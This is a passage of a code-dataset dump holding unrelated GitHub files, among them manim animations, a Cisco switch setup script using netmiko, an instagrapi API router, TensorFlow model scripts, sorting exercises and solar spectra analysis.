FadeOut\n }\n\nclass GrowRandom(WriteRandom):\n CONFIG = {\n \"anim_type\": GrowFromCenter\n }\n\nclass UnGrowRandom(GrowRandom):\n CONFIG = {\n \"anim_kwargs\": {\n \"rate_func\": lambda t: smooth(1-t),\n },\n \"remover\": True,\n }\n\nclass FadeInFromRandom(LaggedStart):\n CONFIG = {\n \"lag_ratio\":0.08,\n \"anim_type\":FadeInFrom,\n \"anim_kwargs\":{}\n }\n def __init__(self,text,**kwargs):\n digest_config(self, kwargs)\n super().__init__(*[\n self.anim_type(text[i],d,**self.anim_kwargs)\n for i,d in zip(return_random_from_word(text),return_random_direction(text))\n ])\n\nclass FadeOutFromRandom(FadeInFromRandom):\n CONFIG = {\n \"anim_type\":FadeOutAndShiftDown\n }\n\nclass GrowFromRandom(LaggedStart):\n CONFIG = {\n \"lag_ratio\":0.2,\n \"anim_kwargs\":{}\n }\n def __init__(self,text,r_x=[-2,3],r_y=[-2,3],step_x=1,step_y=1,**kwargs):\n digest_config(self, kwargs)\n super().__init__(*[\n GrowFromPoint(text[i],d,**self.anim_kwargs)\n for i,d in zip(return_random_from_word(text),return_random_coords(text,r_x,r_y,step_x,step_y))\n ])\n\nclass UnGrowFromRandom(GrowFromRandom):\n CONFIG = {\n \"anim_kwargs\": {\n \"rate_func\": lambda t: smooth(1-t)\n },\n \"remover\": True\n }\n","repo_name":"cigar666/my_manim_projects","sub_path":"my_utils/anim_effects.py","file_name":"anim_effects.py","file_ext":"py","file_size_in_byte":3659,"program_lang":"python","lang":"en","doc_type":"code","stars":189,"dataset":"github-code","pt":"52"} +{"seq_id":"9025448938","text":"OPERATORS = [\"+\",\"-\",\"*\"]\nUNARY_OPERATOR_RANKING = 4\n\ndef get_ranking(operator):\n if operator in OPERATORS:\n return OPERATORS.index(operator)\n return 0\n\ndef value(l_input,l_output,ranking):\n element = l_input.pop(0)\n if element in OPERATORS:\n value(l_input,l_output,UNARY_OPERATOR_RANKING)\n l_output.append((\"uo\",element)) # unary operator\n else:\n l_output.append((\"op\",element)) # operand\n while l_input and get_ranking(l_input[0])>=ranking:\n operator = l_input.pop(0)\n value(l_input,l_output,get_ranking(operator))\n l_output.append((\"bo\",operator)) # binary operator\n return\n\n#a+-b*c-d\ninfix = [\"a\",\"+\",\"-\",\"b\",\"*\",\"-\",\"c\",\"-\",\"d\"]\n\noutput = []\nvalue(infix,output,0)\n","repo_name":"Shildifreak/Shildimon","sub_path":"ShildiEngine/modules/test/reversed_polnish.py","file_name":"reversed_polnish.py","file_ext":"py","file_size_in_byte":739,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"39521933211","text":"# Works for Cisco ios devices\n\nimport serial\nfrom netmiko import ConnectHandler\n\n# Establish serial connection settings\n\ndevice = {\n \"device_type\": \"cisco_ios_serial\",\n \"username\": \"cisco\",\n \"password\": \"cisco\",\n \"secret\": \"cisco\",\n \"fast_cli\": False,\n \"conn_timeout\": 30.0,\n \"serial_settings\": {\n \"baudrate\": serial.Serial.BAUDRATES[12],\n \"bytesize\": serial.EIGHTBITS,\n \"parity\": serial.PARITY_NONE,\n \"stopbits\": serial.STOPBITS_ONE,\n \"port\": \"/dev/cu.usbserial-A9CB9ZHA\",\n },\n}\n\n# Connect to device and verify by performing the show version command\n\nprint(\"Connecting...\")\nwith ConnectHandler(**device) as conn:\n print(\"Connected\")\n if not conn.check_enable_mode():\n conn.enable()\n output = conn.send_command(\"show version\")\n output = conn.send_command(\"show version\")\nprint(output) # Capture success or failure instead of printing to the screen\n\n# Enable a default remote connection for advanced configurations/automation\n\"\"\"\n- Connect to the vlan\n 'conf t'\n 'interface vlan 1'\n- Set a management IP/subnet\n- Set the default gateway\n- Assign hostname and domain name?\n- Set user and password\n- Enable SSH\n- Test remote connection\n\"\"\"\n\ndefault_mgmt= [\n 'conf t',\n 'hostname lasC3560X-test',\n 'ip domain-name lasC3560X-test.com',\n 'username techno privilege 15 secret test123',\n 'crypto key generate rsa',\n '2048',\n 'ip ssh version 2',\n 'vlan 128',\n 'interface vlan 128',\n 'ip address 10.9.128.99 255.255.255.0',\n 'int gi0/47',\n 'switchport mode access',\n 'switchport access vlan 128',\n 'no shut',\n 'exit'\n\n]\n\ndef_mgmt_conf = conn.send_config_set(default_mgmt)\ndef_mgmt_output = conn.send_command(\"show ip arp\")\nprint(def_mgmt_output)\nconn.disconnect()\n\nr_device = {\n'device_type': 'cisco_ios',\n 'host': '10.9.128.99',\n 'username': 'cisco',\n 'password': 'cisco',\n 'port': 20022,\n}\n\nprint(\"Connecting...\")\nwith ConnectHandler(**r_device) as ssh:\n print(\"Connected\")\n if not ssh.check_enable_mode():\n ssh.enable()\n ssh_output = ssh.send_command(\"show version\")\n ssh_output = ssh.send_command(\"show version\")\nprint(ssh_output)\nssh.disconnect()\n# Create Customer's environment\n","repo_name":"Tracks2DevOps/Networking_Scripts","sub_path":"serial_connect2.py","file_name":"serial_connect2.py","file_ext":"py","file_size_in_byte":2244,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"20846153684","text":"from typing import List, Optional\nfrom pathlib import Path\nimport json\n\nfrom fastapi import APIRouter, Depends, File, UploadFile, Form\nfrom instagrapi.types import Media, Location, Usertag\n\nfrom dependencies import ClientStorage, get_clients\nfrom helpers import album_upload_post\n\n\nrouter = APIRouter(\n prefix=\"/album\",\n tags=[\"album\"],\n responses={404: {\"description\": \"Not found\"}},\n)\n\n\n@router.post(\"/download\", response_model=List[Path])\nasync def album_download(sessionid: str = Form(...),\n media_pk: int = Form(...),\n folder: Optional[Path] = Form(\"\"),\n clients: ClientStorage = Depends(get_clients)) -> List[Path]:\n \"\"\"Download photo using media pk\n \"\"\"\n cl = clients.get(sessionid)\n result = cl.album_download(media_pk, folder)\n return result\n\n\n@router.post(\"/download/by_urls\", response_model=List[Path])\nasync def album_download_by_urls(sessionid: str = Form(...),\n urls: List[str] = Form(...),\n folder: Optional[Path] = Form(\"\"),\n clients: ClientStorage = Depends(get_clients)) -> List[Path]:\n \"\"\"Download photo using URL\n \"\"\"\n cl = clients.get(sessionid)\n result = cl.album_download_by_urls(urls, folder)\n return result\n\n\n@router.post(\"/upload\", response_model=Media)\nasync def album_upload(sessionid: str = Form(...),\n files: List[UploadFile] = File(...),\n caption: str = Form(...),\n usertags: Optional[List[str]] = Form([]),\n location: Optional[Location] = Form(None),\n clients: ClientStorage = Depends(get_clients)\n ) -> Media:\n \"\"\"Upload album to feed\n \"\"\"\n cl = clients.get(sessionid)\n \n usernames_tags = []\n for usertag in usertags:\n usertag_json = json.loads(usertag)\n usernames_tags.append(Usertag(user=usertag_json['user'], x=usertag_json['x'], y=usertag_json['y']))\n \n return await album_upload_post(\n cl, files, caption=caption,\n usertags=usernames_tags,\n location=location)\n","repo_name":"adw0rd/instagrapi-rest","sub_path":"routers/album.py","file_name":"album.py","file_ext":"py","file_size_in_byte":2176,"program_lang":"python","lang":"en","doc_type":"code","stars":282,"dataset":"github-code","pt":"52"} +{"seq_id":"38815625283","text":"import tensorflow as tf\nfrom tensorflow.python.tools import freeze_graph\nfrom tensorflow.python.tools import optimize_for_inference_lib\nfrom tensorflow.python.framework import meta_graph\ndir(tf.contrib)\n\nsaved_graph_name = './models/best/ner.pbtxt'\nsaved_ckpt_name = './models/best/model.ckpt-11926'\ninput_node_name = 'encoder_input_data:0'\nout_node_name = 'NER_output'\n\noutput_frozen_graph_name = '../ner_corpus/ner.pb'\n\nfreeze_graph.freeze_graph(input_graph=saved_graph_name,\\\n\t\t\t\t\t\tinput_saver='', \\\n\t\t\t\t\t\tinput_binary=False, \\\n\t\t\t\t\t\tinput_checkpoint=saved_ckpt_name, \\\n\t\t\t\t\t\toutput_node_names=out_node_name, \\\n\t\t\t\t\t\trestore_op_name='', filename_tensor_name='', \\\n\t\t\t\t\t\toutput_graph=output_frozen_graph_name, \\\n\t\t\t\t\t\tclear_devices=True, initializer_nodes='')\n\n# optimized model is not ready, there's still bug in the function.\n'''\ninput_graph_def = tf.GraphDef()\nwith tf.gfile.Open(output_frozen_graph_name, 'r') as f:\n data = f.read()\n input_graph_def.ParseFromString(data)\n\noutput_graph_def = optimize_for_inference_lib.optimize_for_inference(input_graph_def, [], [out_node_name], tf.string.as_datatype_enum)\n\nf = tf.gfile.FastGFile(optimized_model_name, 'w')\nf.write(output_graph_def.SerializeToString())\n'''\n","repo_name":"BlueSummerTrain/AttentionNER","sub_path":"ner/freeze_graph.py","file_name":"freeze_graph.py","file_ext":"py","file_size_in_byte":1221,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"52"} +{"seq_id":"40342367154","text":"from itertools import product\n\nh, w = map(int, input().split())\nboard = [list(map(int, input().split())) for _ in range(h)]\nsa = 2 * h * w\nfor row, col in product(range(h), range(w)):\n n = board[row][col]\n sa += n if row == 0 else abs(n - board[row - 1][col])\n sa += n if col == 0 else abs(n - board[row][col - 1])\n if row == h - 1: sa += n\n if col == w - 1: sa += n\nprint(sa)\n","repo_name":"SamProkopchuk/coding-problems","sub_path":"hackerrank/3d-surface-area/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":392,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"15864273599","text":"def countingsort(arr,exp1):\r\n n=len(arr)\r\n op=[0]*(n)\r\n count=[0]*(10)\r\n for i in range(0,n):\r\n index=(arr[i]/exp1)\r\n count[int((index)%10)]+=1\r\n for i in range(1,10):\r\n count[i]+=count[i-1]\r\n i=n-1\r\n while i>=0:\r\n index=(arr[i]/exp1)\r\n op[count[int((index)%10)]-1]=arr[i]\r\n count[int((index)%10)]-=1\r\n i-=1\r\n i=0\r\n for i in range(0,len(arr)):\r\n arr[i]=op[i]\r\ndef radix(arr):\r\n max1=max(arr)\r\n exp=1\r\n while max1/exp>0:\r\n countingsort(arr,exp)\r\n exp*=10\r\nprint(\"enter the array elements:\")\r\nnums=list(map(int,input().split()))\r\nradix(nums)\r\nfor i in range(len(nums)):\r\n print(nums[i],end=\" \")\r\n \r\n","repo_name":"Jahnavi-Chunduru/-CrackYourInternship","sub_path":"radix sort 83.py","file_name":"radix sort 83.py","file_ext":"py","file_size_in_byte":706,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"5633762527","text":"import csv\nimport itertools\n\nimport pyquery\n\n\ndef extract_saints(d, position):\n result = []\n\n selector = f\"div.article__text > ul:nth-child({position})> li > a\"\n p = d(selector)\n\n for node in p:\n result.append(node.text)\n return result\n\n\ndef saints():\n # https://parenting.pl/imiona-swietych-swiete-imiona-zenskie-i-meskie\n d = pyquery.PyQuery(filename=\"data/święci.html\")\n female_saints = extract_saints(d, 12)\n male_saints = extract_saints(d, 16)\n return set(female_saints), set(male_saints)\n\n\ndef td(d, td_class):\n selector = f\"body > div[align=center] > table > tbody > tr > td.{td_class}\"\n p = d(selector)\n texts = []\n for node in p:\n texts.append(node.text)\n return texts\n\n\ndef process_names(names):\n first = True\n processed_names = []\n for name in names:\n if first:\n first = False\n continue\n processed_names.append(name)\n return processed_names\n\n\ndef process_patronages(patronages):\n first = True\n processed_patronages = []\n for patronage in patronages:\n if first:\n first = False\n continue\n processed_patronage = patronage.removeprefix(\"Patron \")\n processed_patronage = processed_patronage.removeprefix(\"Patronka \")\n processed_patronages.append(processed_patronage)\n return processed_patronages\n\n\ndef patrons():\n # https://patroni.waw.pl\n d = pyquery.PyQuery(filename=\"data/patroni.html\")\n names = td(d, \"a\")\n patronages = td(d, \"b\")\n\n processed_names = process_names(names)\n processed_patronages = process_patronages(patronages)\n\n return list(zip(processed_names, processed_patronages))\n\n\ndef possible_patrons(patron_names, name):\n result = []\n for patron in patron_names:\n if name in patron:\n result.append(patron)\n return result\n\n\ndef merge(saints_data, patrons_data):\n name_to_patronage = {name: patronage for name, patronage in patrons_data}\n patron_names = [name for name, _ in patrons_data]\n result = []\n for name in saints_data:\n try:\n local_patrons = possible_patrons(patron_names, name)\n for local_patron in local_patrons:\n patronage = name_to_patronage[local_patron]\n result.append((local_patron, patronage))\n except KeyError as exception:\n missing = exception.args[0]\n print(f\"Not found: {missing}.\")\n return result\n\n\ndef merged(saints_data, patrons_data):\n female_saints_data, male_saints_data = saints_data\n female_merged = merge(female_saints_data, patrons_data)\n male_merged = merge(male_saints_data, patrons_data)\n return female_merged, male_merged\n\n\ndef main():\n print(\"Starting...\")\n\n print(\"Saints...\")\n saints_data = saints()\n female_saints_data, male_saints_data = saints_data\n print(\"Female...\")\n print(female_saints_data)\n print(\"Male...\")\n print(male_saints_data)\n print()\n\n print(\"Patrons...\")\n patrons_data = patrons()\n print(patrons_data)\n print()\n\n print(\"Merged...\")\n merged_data = merged(saints_data, patrons_data)\n print(merged_data)\n female_merged_data, male_merged_data = merged_data\n print()\n\n print(\"Saving...\")\n with open(\"extracted.csv\", \"w\") as csv_file:\n csv_writer = csv.writer(csv_file)\n for name, patronage in itertools.chain(female_merged_data, male_merged_data):\n csv_writer.writerow((name, patronage))\n print()\n\n print(\"Ending...\")\n\n\nmain()\n","repo_name":"wieczorek1990/patrons","sub_path":"extractor/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":3519,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"4063079425","text":"import os\nimport sys\nimport mysql.connector\nimport boto3\nfrom dotenv import load_dotenv\nfrom visua_to_coco import convert_to_coco\nimport json\nfrom tqdm import tqdm\nimport cv2\n\ndef import_from_S3(S3directory, filename, outputDirectory=None):\n try:\n\n # Access specific S3 bucket\n bucket_name = os.getenv('AWS_BUCKET')\n\n # Create an S3 client\n s3 = boto3.client('s3')\n\n # Construct the source path\n source = S3directory + filename\n\n # Check if the file exists in S3\n response = s3.head_object(Bucket=bucket_name, Key=source)\n error_code = getattr(response, 'response', {}).get('Error', {}).get('Code')\n output_directory = os.path.join(outputDirectory, '') if outputDirectory else ''\n\n if error_code == '404':\n response = s3.head_object(Bucket=bucket_name, Key=source.replace('visua/', ''))\n error_code = getattr(response, 'response', {}).get('Error', {}).get('Code')\n\n if error_code == '404':\n print(source, \"not found\")\n return False\n else: \n print(bucket_name, source, output_directory + filename)\n s3.download_file(bucket_name, source.replace('visua/', ''), output_directory + filename)\n return True\n\n\n print(bucket_name, source, output_directory + filename)\n s3.download_file(bucket_name, source, output_directory + filename)\n\n # Return True to indicate successful download\n return True\n \n except FileNotFoundError:\n print(f\"File not found on S3: {filename}\")\n return False\n except Exception as e:\n print(f\"Error occurred during S3 download: {str(e)}\")\n # Return False to indicate failure in download\n return False\n\ndef main():\n try:\n load_dotenv()\n\n conn = mysql.connector.connect(\n host=os.getenv('DB_HOST'),\n user=os.getenv('DB_USERNAME'),\n password=os.getenv('DB_PASSWORD'),\n database=os.getenv('DB_DATABASE'),\n port=os.getenv('DB_PORT')\n )\n\n cursor = conn.cursor()\n number_of_videos = 1000\n query = \"SELECT logograb_videos.url, logograb_video_analysis.json_url FROM logograb_videos INNER JOIN logograb_video_analysis ON logograb_videos.id = logograb_video_analysis.video_id ORDER BY logograb_videos.id DESC LIMIT \" + str(number_of_videos) + \";\"\n print(query)\n cursor.execute(query)\n\n result = cursor.fetchall()\n image_id = 3000\n\n output_directory = sys.argv[1] if len(sys.argv) > 1 else None\n\n for video_url, analysis_url in result:\n found = True\n print(video_url, analysis_url)\n if analysis_url is not None:\n import_from_S3(S3directory=\"\", filename=analysis_url, outputDirectory=output_directory)\n json_file_path = analysis_url\n # existing_coco_file = \"existing_coco.json\" # Specify the path to an existing COCO JSON file if available\n with open(json_file_path) as f:\n input_data = json.load(f)\n\n if video_url is not None:\n filename = video_url.replace('http://spect8-static.s3.amazonaws.com/', '')\n if not import_from_S3(S3directory=\"\", filename=filename, outputDirectory=output_directory):\n continue\n\n video_path = os.path.join(output_directory, filename) # Specify the path to the corresponding video file\n\n image_id = convert_to_coco(input_data, os.path.join(output_directory, 'images'), video_path, image_id)\n\n video_file = os.path.join(video_path, os.path.basename(filename))\n\n if not os.path.isfile(video_file):\n print(f\"Video file '{video_file}' not found.\")\n continue\n\n try:\n # Open the video file\n cap = cv2.VideoCapture(video_file)\n\n # Check if the video file was successfully opened\n if not cap.isOpened():\n print(f\"Failed to open video file '{video_file}'\")\n continue\n\n # Read frames from the video\n while True:\n ret, frame = cap.read()\n\n # Check if a frame was successfully read\n if not ret:\n print(\"Failed to capture frame from video\")\n break\n\n # Process the frame here\n\n # Release the video file capture\n cap.release()\n os.remove(video_file)\n\n except Exception as e: \n print(f\"An error occurred while processing the video: {str(e)}\")\n\n except Exception as e:\n print(f\"An error occurred: {str(e)}\")\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"ThomasJRye/Foocus-Logodetection","sub_path":"visua_data_maker.py","file_name":"visua_data_maker.py","file_ext":"py","file_size_in_byte":5089,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"70137725286","text":"import os\nimport sys\n\n\ndef ler_arquivo(path):\n if not os.path.exists(path):\n print(\"arquivo {} nao existe\".format(path))\n return None\n else:\n _file = open(path, \"r\")\n conteudo = _file.readlines()\n _file.close()\n return conteudo\n\n\ndef read_meta_data(diretorio):\n data = open(diretorio,\"r\")\n meta_data=[]\n for line in data:\n line_data = line.split('\\t')\n meta_data.append((line_data[0],line_data[1],line_data[2]))\n data.close()\n return meta_data\n\n\ndef grava_saida(resultado, arquivoSaida):\n if not os.path.exists(arquivoSaida):\n print(\"arquivo {} nao existe, foi criado agora\".format(arquivoSaida))\n\n arquivo = open(arquivoSaida, \"w\")\n for item in resultado:\n arquivo.writelines(item + \"\\n\")\n arquivo.close()\n\n\n\ncaminho_do_arquivo = r\"Gastos.txt\"\n# caminho_do_arquivo = \"fat.txt\"\ndata = ler_arquivo(caminho_do_arquivo)\n\nif data is None:\n sys.exit(-1)\n\ncont = 0\nresultado = []\nlinha = \"\"\nfor x in data:\n linha += \" \" + x[:len(x) - 1] + \"\\t\"\n cont += 1\n if cont == 2:\n resultado.append(linha)\n cont =0\n linha = \"\"\n\n\ngrava_saida(resultado, \"saida.txt\")\n\n\n\n\n\n","repo_name":"BrunoBog/nuBank","sub_path":"src/formatar fatura.py","file_name":"formatar fatura.py","file_ext":"py","file_size_in_byte":1194,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"74670156323","text":"# coding: utf-8\r\nimport argparse\r\nfrom docreader import GetDocs\r\n\r\nimport index\r\n\r\n#Параметры командной строки, соответствующие массиву COMPRESSION_CLASSES\r\nCOMPRESSION_CLASSES_NAMES = ['varbyte', 'simple9']\r\n\r\ndef parse_command_line():\r\n parser = argparse.ArgumentParser(description='compressed documents reader')\r\n parser.add_argument('compression', nargs=1, default='varbyte', \r\n choices=['varbyte', 'simple9'], \r\n help='Type of index compression (\"varbyte\" or \"simple9\"')\r\n parser.add_argument('files', nargs='+', help='Input files (.gz or plain) to process')\r\n args = parser.parse_args()\r\n return args.compression[0], args.files #compression[0] - compression is an array ['varbyte'] or ['simple9']\r\n \r\n##main\r\ncompression, filenames = parse_command_line()\r\ncompression_object = index.COMPRESSION_CLASSES[COMPRESSION_CLASSES_NAMES.index(compression)]\r\ndocs = GetDocs(filenames)\r\n\r\n##Сохраняем URL в порядке загрузки\r\nurls_file = open('urls.txt', 'w')\r\nidx = index.NewIndex(compression_object)\r\nfor docid, doc in enumerate(docs):\r\n idx.IndexDocument(docid, doc.text)\r\n urls_file.write(doc.url+'\\n')\r\nurls_file.close()\r\nidx.SaveToFile('test.idx.bin', 'test.dic.bin')\r\n","repo_name":"Fen99/TehnoSphere","sub_path":"02_Info/hw02/src/index_main.py","file_name":"index_main.py","file_ext":"py","file_size_in_byte":1339,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"8833740712","text":"import numpy as np\r\nfrom alexnet import alexnet\r\nfrom tensorflow.keras.callbacks import TensorBoard\r\nfrom random import shuffle\r\nimport cv2\r\nimport pandas\r\nimport tensorflow as tf\r\n\r\nWIDTH = 150\r\nHEIGHT = 150\r\n\r\ngpu_options = tf.GPUOptions(allow_growth=True)\r\nsession = tf.InteractiveSession(config=tf.ConfigProto(gpu_options=gpu_options))\r\n\r\nMODEL_NAME = 'Last_model.model'\r\ntensorboard = TensorBoard(log_dir = 'logs_Last_model'.format(MODEL_NAME))\r\ntrain_data = np.load('Car-dataset/Final_data_balanced.npy', allow_pickle=True)\r\n\r\nshuffle(train_data)\r\nshuffle(train_data)\r\n\r\ntrain = train_data[:-150]\r\ntest = train_data[-150:]\r\n\r\nprint(len(np.array([i[0] for i in train])))\r\nprint(len(np.array([i[0] for i in train]).reshape(-1,WIDTH,HEIGHT,3)))\r\n#print(len(np.array([i[1] for i in train])))\r\n\r\nX = np.array([i[0] for i in train]).reshape(-1,WIDTH,HEIGHT,3)\r\nY = [i[1] for i in train]\r\n\r\nshape = X.shape[1:]\r\nmodel = alexnet(shape)\r\n\r\nX = np.array(X)\r\nY = np.array(Y)\r\n\r\ntest_x = np.array([i[0] for i in test]).reshape(-1,WIDTH,HEIGHT,3)\r\ntest_y = [i[1] for i in test]\r\n\r\ntest_x = np.array(test_x)\r\ntest_y = np.array(test_y)\r\nmodel.fit(X, Y, batch_size=64, epochs=13 ,validation_data = (test_x,test_y),callbacks = [tensorboard])\r\nmodel.save(MODEL_NAME)\r\n\r\n\r\n","repo_name":"usman-vecho/SelfDrivingCar","sub_path":"train_model.py","file_name":"train_model.py","file_ext":"py","file_size_in_byte":1260,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"19891676948","text":"import sys\nsys.stdin = open('input.txt', 'r') \ninput = sys.stdin.readline \n#-------------------------------------------------------\nimport heapq\n\nn = int(input())\n\nheap = []\ncomputers = [0 for _ in range(n)]\ncnt = [0 for _ in range(n)]\ncom = 0\n\nfor _ in range(n):\n p, q = map(int, input().split())\n heapq.heappush(heap, [p, q])\n\nwhile heap:\n p, q = heapq.heappop(heap)\n for i in range(n):\n if computers[i] <= p:\n if computers[i] == 0: com += 1\n computers[i] = q\n cnt[i] += 1\n break\n\nprint(com)\nfor i in cnt:\n if i: print(i, end= \" \")","repo_name":"Al9-Mor9/Algo-Rehabilitation","sub_path":"Code/12764/12764_L.py","file_name":"12764_L.py","file_ext":"py","file_size_in_byte":599,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"28157796778","text":"import random\nfrom timeit import default_timer as timer\n\n\nprint(\"-\" * 38)\nprint(\" \" * 9 + \"GUESS THE NUMBER APP\")\nprint(\"-\" * 38)\n\nthe_number = random.randint(0, 100)\nthe_guess = -1\nstart_time = timer()\n\nwhile the_guess != the_number:\n\n the_guess = input(\"Guess a number between 0 and 100: \")\n\n try:\n the_guess = int(the_guess)\n if the_guess < 0 or the_guess > 100:\n raise ValueError\n except ValueError:\n print(f\"'{the_guess}' is not a vaild number! Try again!\")\n continue\n\n if the_guess == 42:\n print(\"Yes! 42 is always the correct anwser!\")\n break\n\n if the_guess == the_number:\n start_end = timer()\n print(\n f\"Awesome! You got it in {start_end - start_time:.1f} seconds!! Now go back to work!\"\n )\n\n if the_guess > the_number:\n print(f\"Too high man!\")\n\n if the_guess < the_number:\n print(\"Too low man!\")\n","repo_name":"esinghroy/python-learning-cohort","sub_path":"malte/02_guess_that_number/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":925,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"22176901890","text":"import spectra as spc\n\nFeI = {\"El\":0.9146,\"gf\":-4.318,\"lam\":640.0316,\"dep\":0.533,\"name\":\"Fe I\"}\nMyst = {\"El\": -1,\"gf\": 0,\"lam\":640.5763,\"dep\":0.058,\"name\":\"Myst\"}\nSiI = {\"El\":5.8709,\"gf\":-1.393,\"lam\":640.7291,\"dep\":0.155,\"name\":\"Si I\"}\nFeI2 = {\"El\":3.6864,\"gf\":-1.018,\"lam\":640.8017,\"dep\":0.562,\"name\":\"Fe I\"}\nSiI2 = {\"El\":5.9841,\"gf\":-1.554,\"lam\":640.8670,\"dep\":0.098,\"name\":\"Si I\"}\n\n#Hand placed limits from mean(axis=0)\nwFeI = [1359,1388]\nwMyst = [652, 721];\nwSiI = [478, 518];\nwFeI2 = [377, 438];\nwSiI2 = [310, 340];\n\nsf_qu1 = spc.SpectraFactory(\"data/6405_aS1\",framerows=800,framecols=1472)\nsf_qu1.frame_col_cut([0,1471])\nsf_qu1.frame_row_cut([0]+list(range(668,677))+[799])\nsf_qu1.contrast_cut(50)\nsf_qu1.set_continua(\"segments\")\n\nqu1 = sf_qu1.make_spectra()\nqu1m = qu1[:,:].mean(axis=0) \nqu1con = qu1.meta.cont[0]*qu1.lmbd.mean() + qu1.meta.cont[1]\n\nqu1FeI = spc.splineline(wFeI, FeI, qu1.meta);qu1FeI.recenter(qu1m)\nqu1Myst = spc.splineline(wMyst, Myst, qu1.meta);qu1Myst.recenter(qu1m)\nqu1SiI = spc.splineline(wSiI, SiI, qu1.meta);qu1SiI.recenter(qu1m)\nqu1FeI2 = spc.splineline(wFeI2, FeI2, qu1.meta);qu1FeI2.recenter(qu1m)\nqu1SiI2 = spc.splineline(wSiI2, SiI2, qu1.meta);qu1SiI2.recenter(qu1m)\nqu1lines = [qu1FeI,qu1Myst,qu1SiI,qu1FeI2,qu1SiI2] # ... and save in this list for qu1 \n\nsf_qu2 = spc.SpectraFactory(\"data/6405_bS1\",framerows=756,framecols=1472)\nsf_qu2.frame_col_cut([0,1,1471])\nsf_qu2.frame_row_cut([0]+list(range(663,670))+[799])\nsf_qu2.contrast_cut(50)\nsf_qu2.set_continua(\"segments\")\nqu2 = sf_qu2.make_spectra()\nqu2con = qu2.meta.cont[0]*qu2.lmbd.mean() + qu2.meta.cont[1]\n\nqu2FeI = spc.splineline(wFeI, FeI, qu2.meta)\nqu2Myst = spc.splineline(wMyst, Myst, qu2.meta)\nqu2SiI = spc.splineline(wSiI, SiI, qu2.meta)\nqu2FeI2 = spc.splineline(wFeI2, FeI2, qu2.meta)\nqu2SiI2 = spc.splineline(wSiI2, SiI2, qu2.meta)\nqu2lines = [qu2FeI,qu2Myst,qu2SiI,qu2FeI2,qu2SiI2] # ... and save in this list for qu2 \n\n\n#Hand placed limits from mean(axis=0)\nwMyst = [797, 850]\nwSiI = [611, 647]\nwFeI2 = [505, 571]\nwSiI2 = [442, 470]\n\nsf_spt = spc.SpectraFactory(\"data/6405_aS2\",framerows=774,framecols=1446)\nsf_spt.frame_col_cut([0,1445])\nsf_spt.frame_row_cut([0]+list(range(659,668))+[743])\nsf_spt.contrast_cut(85)\nsf_spt.set_continua(\"segments\")\n\nspt = sf_spt.make_spectra()\nsptm = spt[:,:].mean(axis=0) \nsptcon = spt.meta.cont[0]*spt.lmbd.mean() + spt.meta.cont[1]\n\nsptMyst = spc.splineline(wMyst, Myst, spt.meta);sptMyst.recenter(sptm)\nsptSiI = spc.splineline(wSiI, SiI, spt.meta);sptSiI.recenter(sptm)\nsptFeI2 = spc.splineline(wFeI2, FeI2, spt.meta);sptFeI2.recenter(sptm)\nsptSiI2 = spc.splineline(wSiI2, SiI2, spt.meta);sptSiI2.recenter(sptm)\nsptlines = [sptMyst,sptSiI,sptFeI2,sptSiI2] # ... and save in this list for spt \n\num = 0.38978\nwl = 0.64927\npn = 0.83791\n\nxspotlims = (640.38104838709671, 640.69435483870961)\nyspotlims = (0.86458333333333337, 1.0437500000000002)\n\nqu1lims = {}\nqu1lims[\"ewlim\"] = (-0.5 , 2.5 )\nqu1lims[\"vellim\"] = (-10 , 10 )\nqu1lims[\"rellim\"] = ( 0.2, 1.1)\nqu1lims[\"fw13lim\"] = (-0.1 , 1.4 )\nqu1lims[\"fwhmlim\"] = (-0.1 , 1.4 )\nqu1lims[\"fw23lim\"] = (-0.1 , 1.4 )\nqu1lims[\"as13lim\"] = (-0.7 , 0.7 )\nqu1lims[\"as12lim\"] = (-0.8 , 0.7 )\nqu1lims[\"as23lim\"] = (-1.1 , 0.6 )\n\nqu2lims = {}\nqu2lims[\"ewlim\"] = (-0.5 , 2.5 )\nqu2lims[\"vellim\"] = (-10 , 10 )\nqu2lims[\"rellim\"] = ( 0.1 , 1.3 )\nqu2lims[\"fw13lim\"] = (-0.2 , 1.2 )\nqu2lims[\"fwhmlim\"] = (-0.1 , 1.2 )\nqu2lims[\"fw23lim\"] = (-0.2 , 1.2 )\nqu2lims[\"as13lim\"] = (-0.7 , 0.7 )\nqu2lims[\"as12lim\"] = (-0.8 , 0.7 )\nqu2lims[\"as23lim\"] = (-1.1 , 0.6 )\n\nsptlims = {}\nsptlims[\"ewlim\"] = ( 0.3 , 2.1 )\nsptlims[\"vellim\"] = (-8 , 8 )\nsptlims[\"rellim\"] = ( 0.2, 1.01)\nsptlims[\"fw13lim\"] = (-0.2 , 2 )\nsptlims[\"fwhmlim\"] = (-0.3 , 3 )\nsptlims[\"fw23lim\"] = (-0.4 , 3 )\nsptlims[\"as13lim\"] = (-1.5 , 0.74)\nsptlims[\"as12lim\"] = (-2.0 , 0.74)\nsptlims[\"as23lim\"] = (-2.0 , 0.84)\n\n# Sunspot measurement\nif False:\n umbra = 0.35\n wall = (0.35,0.75)\n penumbra = (0.75,0.89)\n quiet = (0.89)\n as2um = s2.make_spectra_subset(as2,rowsubset=(as2con < umbra),desc=\"Umbra subset\")\n as2wl = 